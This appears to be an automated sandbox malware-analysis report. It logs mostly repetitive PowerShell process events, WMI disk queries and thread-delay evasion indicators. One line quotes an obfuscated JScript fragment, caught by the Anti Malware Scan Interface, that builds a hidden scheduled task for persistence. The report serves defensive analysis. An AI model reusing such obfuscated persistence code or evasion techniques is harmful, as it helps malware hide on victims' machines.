Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: USERDOMAIN%\\%U@t!Cr!a@tQui@!tFil!G@Conn!ct@TaskD!finitionR!gist!r@hPat@l!Op!nT!xtFi@utions Enabl!r.xmlSol@Sl!!p@idd!nH@gss!ttin@il!D!l!t!F@vailabl!StartWh!nA";eSASsVQ = bcYigXs["sp"+"l"+"it"]("@");YJ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId=&apos;C:&apos;
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9660Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9899Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8438
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9934
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8884Thread sleep count: 9660 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9160Thread sleep count: 9899 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1600Thread sleep count: 8438 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228Thread sleep count: 9934 > 30
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
